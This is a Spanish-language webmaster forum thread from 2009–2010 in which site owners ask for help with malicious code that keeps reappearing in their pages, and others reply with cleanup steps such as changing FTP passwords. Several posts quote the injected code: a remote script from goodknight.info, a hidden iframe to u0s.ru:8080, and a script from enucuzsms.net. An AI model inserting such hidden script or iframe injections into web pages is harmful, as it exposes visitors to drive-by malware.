Problema Codigo Malicioso en mi sitio

nicomariani · #1 (**permalink**) 12/07/2009, 11:14

Hola amigos, estoy buscando ayuda, google me ha detectado que tengo codigo malicioso en mi web nuevamente, ya he revisado el sitio como 4 veces, y he borrado las lineas que se agregan, pero al dia siguiente vuelven a aparecer.
Alguien tiene idea de como puedo evitar esto..
Algunas aclaraciones, la pagina es toda en HTML, no tengo formularios, ni uso base de datos, el hosting es pago.

Sitio: www.degios.com.ar

codigo que se inserta en la mayoria de las paginas...

Código:

<script src="http://goodknight.info/stats/show.js"></script>

Código:

<iframe src="http://u0s.ru:8080/index.php" width=157 height=139 style="visibility: hidden"></iframe>

Espero que alguien pueda ayudarme, dado que el cliente se me esta quejando que no puede acceder al sitio :(

jomaruro · #2 (**permalink**) 12/07/2009, 13:59

Hola:

¿Has añadido algún objeto ajeno, como alguna estadística, contador, etc.? Porque en algunos casos, esas cosas generan su propio código.

Saludos.

nicomariani · #3 (**permalink**) 12/07/2009, 14:03

gracias por contestar amigo, pero no no he agregado nada. Un dia empezo google a poner ese mensajito y no lo pude sacar mas...
Existe alguna forma de evitar que se produzca la insercion de ese codigo???

jomaruro · #4 (**permalink**) 12/07/2009, 14:40

Hola:

Pienso que borrando todo lo que has subido al host y luego volver a subirlo de nuevo. Por si es un virus o algo por el estilo.

Saludos.

nicomariani · #5 (**permalink**) 12/07/2009, 14:51

ok ahora lo estoy haciendo, te comento como me fue en un ratito.
gracias.

kseso? · #6 (**permalink**) 12/07/2009, 15:26

Hola Nicomariani
Normalmente google no suele fallar:
u0s.ru:8080

El primer resultado es este tema, el segundo no aporta nada, pero en el tercero ya tienes información de tu problema y un enlace al final que te puede interesar:
~~You can find the clean up instructions~~
Parece que ese enlace está roto, pero una búsqueda en ese blog nos lleva a él y a su receta:

Cita:

How to clean up?

1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.

Suerte.

Gustavo1973 · #7 (**permalink**) 17/07/2009, 14:06

A mi me pasa lo mismo, por mas que borro el iframe vuelve a aparecer al otro dia.
Solo me pasa el los servidores windows con php, el los otros que son linux no.
Saludos

grangonzo · #8 (**permalink**) 17/07/2009, 15:47

Busca en las herramientas para webmasters de Google.

Alli te dice exactamente que archivo tiene el codigo malicioso. Lo buscas al codigo, y luego buscas en todos los demas archivos de tu web y lo eliminas.

Eso te deberia solucionar el problema....

El_Sensei_Sherman · #9 (**permalink**) 17/07/2009, 21:31

A mi tambien me paso.

******** me recomendo buscar vulnerabilidades en mi codigo, por ejemplo SQL Injections.

No habia ninguna... pero solucione el problema cambiando la clave del FTP.

Ah y obviamente tuve que arreglar todos los archivos a mano...

Slds

Gustavo1973 · #10 (**permalink**) 18/07/2009, 14:19

Hice lo mismo, saque recordar claves del programa ftp, las pongo cuando voy a conectarme.
Voy a ver que pasa los proximos dias si vuelve el problema.
Saludos

QUINTOEDU · #11 (**permalink**) 11/04/2010, 11:02

HOLA GENTE
A MI ME SUCEDE LO MISMO CON MI SITIO [URL="http://WWW.LANUSGUIACOMERCIAL.COM.AR"]http://WWW.LANUSGUIACOMERCIAL.COM.AR[/URL]SALE EL CARTEL DE GOOGLE" ESTE SITIO PUEDE DAÑAR ..."
DICE QUE CONTIENE LOS SIGUYIENTE CODIGOS MALICIOSOS

Javascript remoto incluido: http://enucuzsms.net/images/hakkimizda.php

<script src=http://enucuzsms.net/images/hakkimizda.php> </ script>

</head> <script src=http://enucuzsms.net/images/hakkimizda.php ></sc ript><body>

PERO COMO LOS ENCUENTRO EN MI WEB Y COMO LOS SACO
DESDE YA MUCHAS GRACIAS GENTE
EDUARDO